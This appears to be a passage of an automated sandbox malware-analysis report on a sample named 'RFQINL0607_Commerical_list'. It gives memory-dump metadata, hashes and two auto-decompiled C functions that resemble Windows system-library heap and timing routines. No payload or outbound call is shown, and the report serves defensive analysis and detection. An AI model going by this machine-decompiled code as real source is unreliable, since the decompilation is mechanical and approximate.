                                                                                                                                                                                  0x3340b2cc
                                                                                                                                                                                  0x3340b2ed
                                                                                                                                                                                  0x3340b2ed
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b2d3
                                                                                                                                                                                  0x3340b2d7
                                                                                                                                                                                  0x3340b2dc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b2e8
                                                                                                                                                                                  0x3340b2ef
                                                                                                                                                                                  0x3340b2f1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b302
                                                                                                                                                                                  0x3340b302
                                                                                                                                                                                  0x3340b30b
                                                                                                                                                                                  0x3340b30d
                                                                                                                                                                                  0x3340b31f
                                                                                                                                                                                  0x3340b31f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b30d
                                                                                                                                                                                  0x3340b2f1
                                                                                                                                                                                  0x3340b2cc
                                                                                                                                                                                  0x3340b293
                                                                                                                                                                                  0x3340b229
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b22f
                                                                                                                                                                                  0x3340b234
                                                                                                                                                                                  0x3340b258
                                                                                                                                                                                  0x3340b258
                                                                                                                                                                                  0x3340b25a
                                                                                                                                                                                  0x3340b25c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b267
                                                                                                                                                                                  0x3340b27b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b281
                                                                                                                                                                                  0x3340b288
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b288
                                                                                                                                                                                  0x3340b236
                                                                                                                                                                                  0x3340b23c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b23e
                                                                                                                                                                                  0x3340b247
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b253
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b253
                                                                                                                                                                                  0x3340b1b8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b1be
                                                                                                                                                                                  0x3340b1c4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b1ca
                                                                                                                                                                                  0x3340b1ce
                                                                                                                                                                                  0x3340b1d8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b1e2
                                                                                                                                                                                  0x3340b1ee
                                                                                                                                                                                  0x3340b1f6
                                                                                                                                                                                  0x3340b1f8
                                                                                                                                                                                  0x3340b1fd
                                                                                                                                                                                  0x3340b329
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b20b
                                                                                                                                                                                  0x3340b20b
                                                                                                                                                                                  0x3340b210
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b219
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b219
                                                                                                                                                                                  0x3340b108
                                                                                                                                                                                  0x3340b10a
                                                                                                                                                                                  0x3340b306
                                                                                                                                                                                  0x3340b306
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b119
                                                                                                                                                                                  0x3340b119
                                                                                                                                                                                  0x3340b11c
                                                                                                                                                                                  0x3340b125
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b139
                                                                                                                                                                                  0x3340b141
                                                                                                                                                                                  0x3340b143
                                                                                                                                                                                  0x3340b143
                                                                                                                                                                                  0x3340b146
                                                                                                                                                                                  0x3340b146
                                                                                                                                                                                  0x3340b149
                                                                                                                                                                                  0x3340b149
                                                                                                                                                                                  0x3340b14e
                                                                                                                                                                                  0x3340b334
                                                                                                                                                                                  0x3340b33a
                                                                                                                                                                                  0x3340b33a
                                                                                                                                                                                  0x3340b156
                                                                                                                                                                                  0x3340b331
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b331
                                                                                                                                                                                  0x3340b15e
                                                                                                                                                                                  0x3340b1aa
                                                                                                                                                                                  0x3340b1aa
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b1aa
                                                                                                                                                                                  0x3340b160
                                                                                                                                                                                  0x3340b165
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b167
                                                                                                                                                                                  0x3340b16e
                                                                                                                                                                                  0x3340b17d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b183
                                                                                                                                                                                  0x3340b18c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b192
                                                                                                                                                                                  0x3340b195
                                                                                                                                                                                  0x3340b19e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b1a7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3340b1a7
                                                                                                                                                                                  0x3340b10a
                                                                                                                                                                                  0x3340b102
                                                                                                                                                                                  0x3340b0e4
                                                                                                                                                                                  0x3340b0dd
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                                                                                                                  • Instruction ID: 2e1f74391d5e8c7ef011dbdd92a7d4b1e75e2ac9f0e6d8fe8060788f558ea265
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                                                                                                                  • Instruction Fuzzy Hash: C571CE75F0061A8BDB00CF65C891AAEF3B9AF40788FA8412AD850AB240E774D941CF9C
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3341A6C0 Relevance: .2, Instructions: 222COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                                  			E3341A6C0(signed char* __ecx, signed int __edx, signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				void* __ebx;
				void* __esi;
				intOrPtr _t84;
				signed int _t91;
				signed int _t92;
				intOrPtr* _t104;
				char _t110;
				signed int _t112;
				char* _t113;
				char _t117;
				intOrPtr* _t135;
				signed int _t136;
				unsigned int _t139;
				signed int _t152;
				signed int _t158;
				signed char _t159;
				unsigned int _t171;
				signed int _t175;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed char* _t196;
				intOrPtr* _t202;

				_t135 = _a8;
				_t196 = __ecx;
				_t84 =  *((intOrPtr*)(_t135 + 0x10));
				_t190 = __edx;
				_v28 = __edx;
				_t171 =  *((intOrPtr*)(_t135 + 4)) + 0xfff >> 0xc;
				_v40 = __ecx;
				_t139 = _t84 + 0xfff >> 0xc;
				_v16 = _t139;
				_v16 = _v16 << 0xc;
				_v36 = _t171;
				_v32 = _t139;
				if(_v16 >= _t84) {
					__eflags = _t139 - _t171;
					if(_t139 > _t171) {
						L36:
						__eflags = _t190 & 0x02000000;
						if((_t190 & 0x02000000) != 0) {
							goto L1;
						}
						_t191 = E334199CA(_t196, _a4, _t135, _t190);
						L38:
						return _t191;
					}
					_v20 = __ecx[4];
					__eflags =  *__ecx >> 8 - 2;
					if( *__ecx >> 8 < 2) {
						L5:
						__eflags =  *(_t196 + 0xc) & 0x04000000;
						if(( *(_t196 + 0xc) & 0x04000000) != 0) {
							goto L36;
						} else {
							E333A7B54(_t196, _t190);
							_t91 = _t196 + 0x44;
							__eflags =  *(_t91 + 4) & 0x00000001;
							_t136 =  *_t91;
							if(( *(_t91 + 4) & 0x00000001) != 0) {
								__eflags = _t136;
								if(_t136 == 0) {
									_t136 = 0;
									__eflags = 0;
								} else {
									_t136 = _t136 ^ _t91;
								}
							}
							_t92 = _a4;
							_t175 =  *(_t91 + 4) & 1;
							while(1) {
								__eflags = _t136;
								if(_t136 == 0) {
									break;
								}
								_t143 =  *(_t136 + 0xc) & 0xffff0000;
								__eflags = _t92 - ( *(_t136 + 0xc) & 0xffff0000);
								if(__eflags < 0) {
									_t143 =  *_t136;
									L15:
									__eflags = _t175;
									if(_t175 == 0) {
										L18:
										_t136 = _t143;
										continue;
									}
									__eflags = _t143;
									if(_t143 == 0) {
										goto L18;
									}
									_t136 = _t136 ^ _t143;
									continue;
								}
								if(__eflags <= 0) {
									break;
								}
								_t143 =  *(_t136 + 4);
								goto L15;
							}
							__eflags = _t136;
							if(_t136 != 0) {
								_t192 =  *(_t136 + 0x10);
								_t29 = (1 << (_t192 >> 0x00000002 & 0x0000003f)) - 1; // 0x0
								_t202 = _v40;
								_v20 = ((_t192 >> 0x00000001 & 0x00000001) + (_t192 >> 0xc) << 0xc) - 1 + (1 << (_t192 >> 0x00000002 & 0x0000003f)) - (((_t192 >> 0x00000001 & 0x00000001) + (_t192 >> 0x0000000c) << 0x0000000c) - 0x00000001 + 1 & _t29);
								 *(_t136 + 0x10) = _t192 & 0x00000fff | _v32 << 0x0000000c;
								_t195 = _v28;
								 *(_t136 + 0xc) = (_v32 << 0xc) -  *((intOrPtr*)(_a8 + 0xc));
								E333A7B8C(_t202, _v28, _a8);
								_t104 = _a8;
								__eflags =  *(_t104 + 8);
								if( *(_t104 + 8) == 0) {
									_t191 = _a4;
								} else {
									_t191 = _a4;
									E334185B0(_t191,  *_t104, _t202, _t191,  *((intOrPtr*)(_t104 + 0xc)), _t195);
								}
								_t152 = _v32;
								__eflags = _t152 - _v36;
								if(_t152 < _v36) {
									_push( *((intOrPtr*)(_t202 + 4)));
									_push( *_t202);
									_t110 = (( *(_t136 + 0x10) >> 0x00000001 & 0x00000001) + _t152 << 0xc) + _t191;
									_v12 = _t110;
									_v8 = _v20 - _t110 + _t191;
									_push(0x8000);
									E33418845( &_v12,  &_v8);
									_t112 = L33363C40();
									__eflags = _t112;
									if(_t112 == 0) {
										_t113 = 0x7ffe0388;
									} else {
										_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
									}
									__eflags =  *_t113;
									if( *_t113 != 0) {
										E3340DA30(_t136, _t202, _v12, _v8);
									}
									_v20 = _v20 - _v8;
									_t117 = _v16 + _t191;
									_t158 = _v12 - _t117;
									__eflags = _t158;
									_v12 = _t117;
									_v8 = _t158;
									if(_t158 != 0) {
										_push( *((intOrPtr*)(_t202 + 4)));
										_push( *_t202);
										_push(0x4000);
										E33418845( &_v12,  &_v8);
									}
									_t159 = _v20;
									asm("bsf ecx, ecx");
									_v40 = _t159;
									__eflags = _t159 - ( *(_t136 + 0x10) >> 0x00000002 & 0x0000003f);
									if(_t159 != ( *(_t136 + 0x10) >> 0x00000002 & 0x0000003f)) {
										E333A7B54(_t202, _v28);
										_t75 = _t136 + 0x10;
										 *_t75 =  *(_t136 + 0x10) ^ (_v40 << 0x00000002 ^  *(_t136 + 0x10)) & 0x000000fc;
										__eflags =  *_t75;
										E333A7B8C(_t202, _v28, _v40);
									}
									asm("lock xadd [eax], ecx");
									asm("lock xadd [eax], edx");
								}
							} else {
								E333A7B8C(_t196, _t190, _t143);
								_t191 = _t190 | 0xffffffff;
							}
							goto L38;
						}
					}
					__eflags =  *__ecx & 0x00000006;
					if(( *__ecx & 0x00000006) == 0) {
						goto L36;
					}
					goto L5;
				}
				L1:
				_t191 = 0;
				goto L38;
			}


































                                                                                                                                                                                  0x3341a6c9
                                                                                                                                                                                  0x3341a6cd
                                                                                                                                                                                  0x3341a6d0
                                                                                                                                                                                  0x3341a6d3
                                                                                                                                                                                  0x3341a6de
                                                                                                                                                                                  0x3341a6e1
                                                                                                                                                                                  0x3341a6ea
                                                                                                                                                                                  0x3341a6ed
                                                                                                                                                                                  0x3341a6f0
                                                                                                                                                                                  0x3341a6f3
                                                                                                                                                                                  0x3341a6f7
                                                                                                                                                                                  0x3341a6fa
                                                                                                                                                                                  0x3341a700
                                                                                                                                                                                  0x3341a709
                                                                                                                                                                                  0x3341a70b
                                                                                                                                                                                  0x3341a917
                                                                                                                                                                                  0x3341a917
                                                                                                                                                                                  0x3341a91d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341a92f
                                                                                                                                                                                  0x3341a931
                                                                                                                                                                                  0x3341a937
                                                                                                                                                                                  0x3341a937
                                                                                                                                                                                  0x3341a714
                                                                                                                                                                                  0x3341a71c
                                                                                                                                                                                  0x3341a71e
                                                                                                                                                                                  0x3341a729
                                                                                                                                                                                  0x3341a729
                                                                                                                                                                                  0x3341a730
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341a736
                                                                                                                                                                                  0x3341a73a
                                                                                                                                                                                  0x3341a73f
                                                                                                                                                                                  0x3341a742
                                                                                                                                                                                  0x3341a746
                                                                                                                                                                                  0x3341a748
                                                                                                                                                                                  0x3341a74a
                                                                                                                                                                                  0x3341a74c
                                                                                                                                                                                  0x3341a752
                                                                                                                                                                                  0x3341a752
                                                                                                                                                                                  0x3341a74e
                                                                                                                                                                                  0x3341a74e
                                                                                                                                                                                  0x3341a74e
                                                                                                                                                                                  0x3341a74c
                                                                                                                                                                                  0x3341a758
                                                                                                                                                                                  0x3341a75b
                                                                                                                                                                                  0x3341a784
                                                                                                                                                                                  0x3341a784
                                                                                                                                                                                  0x3341a786
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341a763
                                                                                                                                                                                  0x3341a769
                                                                                                                                                                                  0x3341a76b
                                                                                                                                                                                  0x3341a774
                                                                                                                                                                                  0x3341a776
                                                                                                                                                                                  0x3341a776
                                                                                                                                                                                  0x3341a778
                                                                                                                                                                                  0x3341a782
                                                                                                                                                                                  0x3341a782
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341a782
                                                                                                                                                                                  0x3341a77a
                                                                                                                                                                                  0x3341a77c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341a77e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341a77e
                                                                                                                                                                                  0x3341a76d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341a76f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341a76f
                                                                                                                                                                                  0x3341a788
                                                                                                                                                                                  0x3341a78a
                                                                                                                                                                                  0x3341a79e
                                                                                                                                                                                  0x3341a7c5
                                                                                                                                                                                  0x3341a7d2
                                                                                                                                                                                  0x3341a7dc
                                                                                                                                                                                  0x3341a7ea
                                                                                                                                                                                  0x3341a7ed
                                                                                                                                                                                  0x3341a7fc
                                                                                                                                                                                  0x3341a800
                                                                                                                                                                                  0x3341a805
                                                                                                                                                                                  0x3341a808
                                                                                                                                                                                  0x3341a80c
                                                                                                                                                                                  0x3341a821
                                                                                                                                                                                  0x3341a80e
                                                                                                                                                                                  0x3341a814
                                                                                                                                                                                  0x3341a81a
                                                                                                                                                                                  0x3341a81a
                                                                                                                                                                                  0x3341a824
                                                                                                                                                                                  0x3341a827
                                                                                                                                                                                  0x3341a82a
                                                                                                                                                                                  0x3341a836
                                                                                                                                                                                  0x3341a83b
                                                                                                                                                                                  0x3341a848
                                                                                                                                                                                  0x3341a84c
                                                                                                                                                                                  0x3341a851
                                                                                                                                                                                  0x3341a857
                                                                                                                                                                                  0x3341a85c
                                                                                                                                                                                  0x3341a861
                                                                                                                                                                                  0x3341a866
                                                                                                                                                                                  0x3341a868
                                                                                                                                                                                  0x3341a87a
                                                                                                                                                                                  0x3341a86a
                                                                                                                                                                                  0x3341a873
                                                                                                                                                                                  0x3341a873
                                                                                                                                                                                  0x3341a87f
                                                                                                                                                                                  0x3341a882
                                                                                                                                                                                  0x3341a88c
                                                                                                                                                                                  0x3341a88c
                                                                                                                                                                                  0x3341a89a
                                                                                                                                                                                  0x3341a8a0
                                                                                                                                                                                  0x3341a8a2
                                                                                                                                                                                  0x3341a8a2
                                                                                                                                                                                  0x3341a8a4
                                                                                                                                                                                  0x3341a8a7
                                                                                                                                                                                  0x3341a8aa
                                                                                                                                                                                  0x3341a8ac
                                                                                                                                                                                  0x3341a8b2
                                                                                                                                                                                  0x3341a8b7
                                                                                                                                                                                  0x3341a8bc
                                                                                                                                                                                  0x3341a8bc
                                                                                                                                                                                  0x3341a8c1
                                                                                                                                                                                  0x3341a8c7
                                                                                                                                                                                  0x3341a8d0
                                                                                                                                                                                  0x3341a8d3
                                                                                                                                                                                  0x3341a8d5
                                                                                                                                                                                  0x3341a8dc
                                                                                                                                                                                  0x3341a8f4
                                                                                                                                                                                  0x3341a8f4
                                                                                                                                                                                  0x3341a8f4
                                                                                                                                                                                  0x3341a8fa
                                                                                                                                                                                  0x3341a8fa
                                                                                                                                                                                  0x3341a90a
                                                                                                                                                                                  0x3341a911
                                                                                                                                                                                  0x3341a911
                                                                                                                                                                                  0x3341a78c
                                                                                                                                                                                  0x3341a791
                                                                                                                                                                                  0x3341a796
                                                                                                                                                                                  0x3341a796
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341a78a
                                                                                                                                                                                  0x3341a730
                                                                                                                                                                                  0x3341a720
                                                                                                                                                                                  0x3341a723
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341a723
                                                                                                                                                                                  0x3341a702
                                                                                                                                                                                  0x3341a702
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                                                                                                                  • Instruction ID: 8dfeff88e633a2187cef268466555281ef82b3e28058f5623a236ba33071acf6
                                                                                                                                                                                  • Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                                                                                                                  • Instruction Fuzzy Hash: 60817F76E007098FDB08CF99C880AAEB7F6FF84310F198569D8659B354DB74EA12CB54
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3338E1A4 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                                  			E3338E1A4(intOrPtr __ecx, signed int __edx) {
				signed int _v8;
				signed int _v16;
				char _v36;
				char _v37;
				signed int _v44;
				signed int _v48;
				char _v52;
				signed int _v56;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr _v80;
				char _v84;
				char _v92;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t116;
				signed int _t127;
				signed int _t128;
				signed int _t130;
				signed int _t131;
				signed int _t140;
				void* _t148;
				signed int _t158;
				signed int _t159;
				intOrPtr _t161;
				intOrPtr _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				intOrPtr _t172;
				signed int _t174;
				signed int _t187;

				_t162 = __edx;
				_t150 = __ecx;
				_v8 =  *0x3344b370 ^ _t174;
				_t172 = __ecx;
				_v37 = __edx;
				_t148 = 0;
				_v72 = __ecx;
				_v48 = 0;
				_v52 = 0;
				if(( *(__ecx + 0xd4) & 0x04000000) != 0) {
					_t162 =  &_v48;
					_t167 = E33423527(__ecx,  &_v48,  &_v52);
					__eflags = _t167;
					if(_t167 < 0) {
						L16:
						if(_t187 != 0) {
							L27:
							_t148 = E3337ABA0(_t167);
						}
						return E33394B50(_t148, _t148, _v8 ^ _t174, _t162, _t167, _t172);
					}
					 *((intOrPtr*)(__ecx + 0x118)) =  *((intOrPtr*)(__ecx + 0x118)) + _v48;
					 *((intOrPtr*)(__ecx + 0x114)) =  *((intOrPtr*)(__ecx + 0x114)) + _v52;
				}
				_t9 = _t172 + 0x14c; // 0x14c
				if( *_t9 == _t9) {
					_t65 = _t172 + 0x154; // 0x154
					_t114 = _t65;
					__eflags =  *_t65 - _t114;
					if( *_t65 != _t114) {
						goto L2;
					}
					__eflags =  *((intOrPtr*)(_t172 + 0x168)) - _t148;
					if( *((intOrPtr*)(_t172 + 0x168)) != _t148) {
						goto L2;
					}
					__eflags =  *(_t172 + 0xd4) & 0x00001000;
					if(( *(_t172 + 0xd4) & 0x00001000) != 0) {
						goto L2;
					}
					_push(3);
					_push(0x18);
					_push( &_v36);
					_push( &_v92);
					_push( *((intOrPtr*)(_t172 + 0x68)));
					_t167 = E33392E40();
					__eflags = _t167;
					if(_t167 < 0) {
						goto L16;
					}
					_t74 = _v16 + 3; // 0x3
					_t168 = _t74 &  ~_v16;
					L3:
					_v44 = _t168;
					_t116 = L33365D90(_t150,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t168);
					_v56 = _t116;
					if(_t116 == 0) {
						_t167 = 0xc0000017;
						goto L27;
					}
					_push(_t148);
					_v84 = _t148;
					_push( &_v84);
					_push(_t168);
					_push(_t116);
					_v80 = _t148;
					_push( &_v92);
					_push(_t148);
					_push(_t148);
					_push(_t148);
					_push( *((intOrPtr*)(_t172 + 0x68)));
					_t167 = E333929F0();
					if(_t167 < 0) {
						L15:
						E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t148, _v56);
						_t187 = _t167;
						goto L16;
					}
					_t169 = _v56;
					_t154 = _v44;
					if(_v44 >=  *_t169) {
						_t154 =  *_t169;
						_v44 =  *_t169;
					}
					if(_v37 != _t148) {
						L12:
						 *((intOrPtr*)(_t169 + 0x30)) =  *((intOrPtr*)(_t169 + 4));
						E3338E330( *((intOrPtr*)(_t169 + 4)), _t172, _t169, _v44);
						_t162 = _t169;
						E33390EC6(_t172, _t169, _v44);
						_push(_t148);
						_push( &_v84);
						_push(_v44);
						_push(_t169);
						_push( &_v92);
						_push(_t148);
						_push(_t148);
						_push(_t148);
						_push( *((intOrPtr*)(_t172 + 0x68)));
						_t167 = E33392A10();
						if(_v37 == 0 && _t167 >= 0) {
							_t127 =  *(_t172 + 0xd4);
							if((_t127 & 0x04000020) != 0) {
								__eflags = _t127 & 0x04000000;
								if((_t127 & 0x04000000) == 0) {
									__eflags = _t127 & 0x00002000;
									_t128 =  *(_t172 + 0xd0);
									_t158 = 0x400;
									if((_t127 & 0x00002000) == 0) {
										_t158 = 0x100000;
									}
									_t159 = _t128 * _t158;
									_v48 = _t128 * _t158 >> 0x20;
									_t130 =  *(_t172 + 0x118);
									_t162 = _t130 *  *(_t172 + 0x8c) >> 0x20;
									_t131 = _t130 *  *(_t172 + 0x8c);
									__eflags = _t162 - _v48;
									if(__eflags > 0) {
										goto L15;
									} else {
										if(__eflags < 0) {
											L37:
											_v68 = _t131;
											__eflags = _t131 | _t162;
											_v64 = _t162;
											if((_t131 | _t162) != 0) {
												_push(0x14);
												_push(8);
												_push( &_v68);
												_push( &_v100);
												_push( *((intOrPtr*)(_t172 + 0x68)));
												_t167 = L33392C20();
											}
											goto L15;
										}
										__eflags = _t131 - _t159;
										if(_t131 >= _t159) {
											goto L15;
										}
										goto L37;
									}
								}
								_t131 =  *(_t172 + 0xf8);
								_t162 =  *(_t172 + 0xfc);
								goto L37;
							}
						}
						goto L15;
					}
					 *((intOrPtr*)(_t169 + 0x74)) =  *((intOrPtr*)(_t172 + 0x88));
					 *(_t169 + 0x8c) =  *(_t172 + 0x118);
					 *((intOrPtr*)(_t169 + 0x98)) =  *((intOrPtr*)(_t169 + 0x98)) +  *((intOrPtr*)(_t172 + 0x110));
					 *((intOrPtr*)(_t169 + 0x174)) =  *((intOrPtr*)(_t169 + 0x174)) +  *((intOrPtr*)(_t172 + 0x114));
					_t140 =  *(_t172 + 0xd4);
					if((_t140 & 0x00010000) != 0) {
						__eflags = _t140 & 0x00001000;
						if((_t140 & 0x00001000) != 0) {
							E33422AF0(_t172, _t169, _t154, _v48, _v52);
						}
						goto L12;
					}
					while(1) {
						_t161 =  *0x7ffe0018;
						_t166 =  *0x7FFE0014;
						if(_t161 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t169 = _v56;
					_t148 = 0;
					_t172 = _v72;
					 *((intOrPtr*)(_t169 + 0x78)) = _t166;
					 *((intOrPtr*)(_t169 + 0x7c)) = _t161;
					goto L12;
				}
				L2:
				_t168 =  *(_t172 + 0x8c);
				goto L3;
			}






































                                                                                                                                                                                  0x3338e1a4
                                                                                                                                                                                  0x3338e1a4
                                                                                                                                                                                  0x3338e1b3
                                                                                                                                                                                  0x3338e1b8
                                                                                                                                                                                  0x3338e1ba
                                                                                                                                                                                  0x3338e1bd
                                                                                                                                                                                  0x3338e1bf
                                                                                                                                                                                  0x3338e1c3
                                                                                                                                                                                  0x3338e1d0
                                                                                                                                                                                  0x3338e1d3
                                                                                                                                                                                  0x333c8dd3
                                                                                                                                                                                  0x333c8ddb
                                                                                                                                                                                  0x333c8ddd
                                                                                                                                                                                  0x333c8ddf
                                                                                                                                                                                  0x3338e312
                                                                                                                                                                                  0x3338e312
                                                                                                                                                                                  0x333c8e58
                                                                                                                                                                                  0x333c8e5e
                                                                                                                                                                                  0x333c8e5e
                                                                                                                                                                                  0x3338e328
                                                                                                                                                                                  0x3338e328
                                                                                                                                                                                  0x333c8de8
                                                                                                                                                                                  0x333c8df1
                                                                                                                                                                                  0x333c8df1
                                                                                                                                                                                  0x3338e1d9
                                                                                                                                                                                  0x3338e1e1
                                                                                                                                                                                  0x333c8dfc
                                                                                                                                                                                  0x333c8dfc
                                                                                                                                                                                  0x333c8e02
                                                                                                                                                                                  0x333c8e04
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c8e0a
                                                                                                                                                                                  0x333c8e10
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c8e16
                                                                                                                                                                                  0x333c8e20
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c8e26
                                                                                                                                                                                  0x333c8e28
                                                                                                                                                                                  0x333c8e2d
                                                                                                                                                                                  0x333c8e31
                                                                                                                                                                                  0x333c8e32
                                                                                                                                                                                  0x333c8e3a
                                                                                                                                                                                  0x333c8e3c
                                                                                                                                                                                  0x333c8e3e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c8e47
                                                                                                                                                                                  0x333c8e4c
                                                                                                                                                                                  0x3338e1ed
                                                                                                                                                                                  0x3338e1f6
                                                                                                                                                                                  0x3338e1fc
                                                                                                                                                                                  0x3338e201
                                                                                                                                                                                  0x3338e206
                                                                                                                                                                                  0x333c8e53
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c8e53
                                                                                                                                                                                  0x3338e20c
                                                                                                                                                                                  0x3338e210
                                                                                                                                                                                  0x3338e213
                                                                                                                                                                                  0x3338e214
                                                                                                                                                                                  0x3338e215
                                                                                                                                                                                  0x3338e219
                                                                                                                                                                                  0x3338e21c
                                                                                                                                                                                  0x3338e21d
                                                                                                                                                                                  0x3338e21e
                                                                                                                                                                                  0x3338e21f
                                                                                                                                                                                  0x3338e220
                                                                                                                                                                                  0x3338e228
                                                                                                                                                                                  0x3338e22c
                                                                                                                                                                                  0x3338e2fe
                                                                                                                                                                                  0x3338e30b
                                                                                                                                                                                  0x3338e310
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338e310
                                                                                                                                                                                  0x3338e232
                                                                                                                                                                                  0x3338e235
                                                                                                                                                                                  0x3338e23a
                                                                                                                                                                                  0x3338e23c
                                                                                                                                                                                  0x3338e23e
                                                                                                                                                                                  0x3338e23e
                                                                                                                                                                                  0x3338e244
                                                                                                                                                                                  0x3338e2ab
                                                                                                                                                                                  0x3338e2b5
                                                                                                                                                                                  0x3338e2b8
                                                                                                                                                                                  0x3338e2c0
                                                                                                                                                                                  0x3338e2c4
                                                                                                                                                                                  0x3338e2c9
                                                                                                                                                                                  0x3338e2cd
